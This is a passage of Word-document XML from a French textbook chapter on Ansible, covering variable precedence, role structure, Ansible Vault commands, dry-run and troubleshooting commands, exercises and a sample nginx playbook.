                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>group_vars/prod.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Hôte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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host_vars/web1.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Forte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ligne de commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>La plus forte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un rôle réutilisable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Structure d'un rôle</w:t>
        <w:br/>
        <w:t>roles/nginx/</w:t>
        <w:br/>
        <w:t>├── defaults/main.yml</w:t>
        <w:br/>
        <w:t>├── handlers/main.yml</w:t>
        <w:br/>
        <w:t>├── tasks/main.yml</w:t>
        <w:br/>
        <w:t>├── templates/site.conf.j2</w:t>
        <w:br/>
        <w:t>└── vars/main.yml</w:t>
        <w:br/>
        <w:br/>
        <w:t># Utilisation</w:t>
        <w:br/>
        <w:t>- hosts: web</w:t>
        <w:br/>
        <w:t xml:space="preserve">  roles:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">  # ou</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tasks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - ansible.builtin.include_role:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        name: nginx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un rôle se documente par ses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : ce sont les valeurs que l'appelant peut surcharger. Les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vars</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> internes sont réservées aux constantes du rôle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>76.4 Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ansible Vault chiffre des fichiers ou des valeurs entières. La clé de coffre ne doit jamais être versionnée ni stockée à côté du code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six commandes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Chiffrer un fichier</w:t>
        <w:br/>
        <w:t>ansible-vault encrypt group_vars/prod/vault.yml</w:t>
        <w:br/>
        <w:br/>
        <w:t># Éditer et voir</w:t>
        <w:br/>
        <w:t>ansible-vault edit group_vars/prod/vault.yml</w:t>
        <w:br/>
        <w:t>ansible-vault view group_vars/prod/vault.yml</w:t>
        <w:br/>
        <w:br/>
        <w:t># Chiffrer une valeur isolée</w:t>
        <w:br/>
        <w:t>ansible-vault encrypt_string 'motdepasse' --name 'db_password'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Exécution avec la clé</w:t>
        <w:br/>
        <w:t>ansible-playbook playbook.yml --ask-vault-pass</w:t>
        <w:br/>
        <w:t>ansible-playbook playbook.yml --vault-password-file ~/.vault_pass</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LA CLÉ DE COFFRE EST LE VRAI SECRET</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Chiffrer un fichier sans protéger la clé revient à mettre une serrure dont la clé est scotchée sur la porte. Stockez la clé dans un coffre central ou un gestionnaire de secrets, et distribuez-la séparément.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>76.5 Vérifier avant d'appliquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ansible offre trois niveaux de vérification : liste des tâches, simulation, et exécution partielle. Les utiliser systématiquement évite les mauvaises surprises.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq commandes de vérification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Lister ce qui s'exécuterait</w:t>
        <w:br/>
        <w:t>ansible-playbook playbook.yml --list-tasks</w:t>
        <w:br/>
        <w:t>ansible-playbook playbook.yml --list-hosts</w:t>
        <w:br/>
        <w:br/>
        <w:t># Simulation (les modules qui le supportent)</w:t>
        <w:br/>
        <w:t>ansible-playbook playbook.yml --check --diff</w:t>
        <w:br/>
        <w:br/>
        <w:t># Limiter à un hôte ou un groupe</w:t>
        <w:br/>
        <w:t>ansible-playbook playbook.yml --limit web1</w:t>
        <w:br/>
        <w:br/>
        <w:t># Mode verbeux pour comprendre une tâche</w:t>
        <w:br/>
        <w:t>ansible-playbook playbook.yml --limit web1 -vvv</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`--CHECK`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mode simulation : les modules annoncent ce qu'ils feraient sans modifier le système. Certains modules ne le supportent pas et sont ignorés : vérifiez la sortie.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.288 — Cinq symptômes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09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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Vérification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>changed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> à chaque passage</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Module non idempotent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>changed_when</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Tâche ignorée</w:t>
            </w:r>
          </w:p>
        </w:tc>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Condition fausse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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-vv</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Connexion refusée</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Inventaire ou clé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ansible -m ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Permission refusée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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become</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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-K</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Handler non exécuté</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Jamais notifié</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Ordre des tâches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois diagnostics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Tester la connexion et l'inventaire</w:t>
        <w:br/>
        <w:t>ansible all -i inventaire.ini -m ping</w:t>
        <w:br/>
        <w:t>ansible-inventory -i inventaire.ini --list</w:t>
        <w:br/>
        <w:t>ansible web -i inventaire.ini -m ansible.builtin.setup -a</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "filter=ansible_distribution"</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AVANT UN PLAYBOOK EN PRODUCTION</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--list-tasks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur le groupe ciblé.</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--check --diff</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur un hôte représentatif.</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Exécution </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--limit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur un seul serveur.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Extension progressive au reste du groupe.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Journaux conservés pour chaque exécution.</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Ansible se connecte en SSH, sans agent.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Chaque module doit être idempotent.</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command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'est pas idempotent sans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>creates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>changed_when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w: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variables se hiérarchisent, avec des priorités strictes.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Un rôle expose ses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> comme interface.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enabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sont deux réglages distincts d'un service.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Ansible Vault chiffre les secrets, mais pas la clé.</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--check --diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avant le groupe entier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ansible configure les machines. Le chapitre suivant compare cette approche à Chef et Puppet, puis choisit.</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76.1 — Configurer un serveur web</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Nginx doit être installé, configuré et démarré.</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Installez le paquet.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Déployez le modèle.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Rechargez via un handler.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 76.2 — Utiliser Vault</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 mot de passe de base doit être chiffré dans le dépôt.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Créez un fichier chiffré.</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Référencez la variable.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Exécutez avec la clé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 76.3 — Rendre une tâche idempotente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   QUALITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une tâche </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> s'exécute et signale un changement à chaque passage.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Ajoutez une condition.</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Désactivez le compte rendu.</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deux exécutions.</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76.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>---</w:t>
        <w:br/>
        <w:t>- hosts: web</w:t>
        <w:br/>
        <w:t xml:space="preserve">  become: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tasks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - name: Installer nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ansible.builtin.apt:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        name: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">        state: present</w:t>
        <w:br/>
        <w:t xml:space="preserve">        update_cache: true</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    - name: Déployer la configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ansible.builtin.template:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        src: templates/site.conf.j2</w:t>
        <w:br/>
        <w:t xml:space="preserve">        dest: /etc/nginx/sites-available/site.conf</w:t>
        <w:br/>
        <w:t xml:space="preserve">        mode: "0644"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      notify: Recharger nginx</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    - name: Activer le site</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ansible.builtin.file:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        src: /etc/nginx/sites-available/site.conf</w:t>
        <w:br/>
        <w:t xml:space="preserve">        dest: /etc/nginx/sites-enabled/site.conf</w:t>
        <w:br/>
        <w:t xml:space="preserve">        state: link</w:t>
        <w:br/>
        <w:t xml:space="preserve">      notify: Recharger nginx</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    - name: Démarrer nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ansible.builtin.service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        name: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">        state: started</w:t>
        <w:br/>
        <w:t xml:space="preserve">        enabled: true</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  handlers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - name: Recharger nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ansible.builtin.service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        name: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">        state: reloaded</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le handler ne s'exécute qu'une fois, même si plusieurs tâches le notifient.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
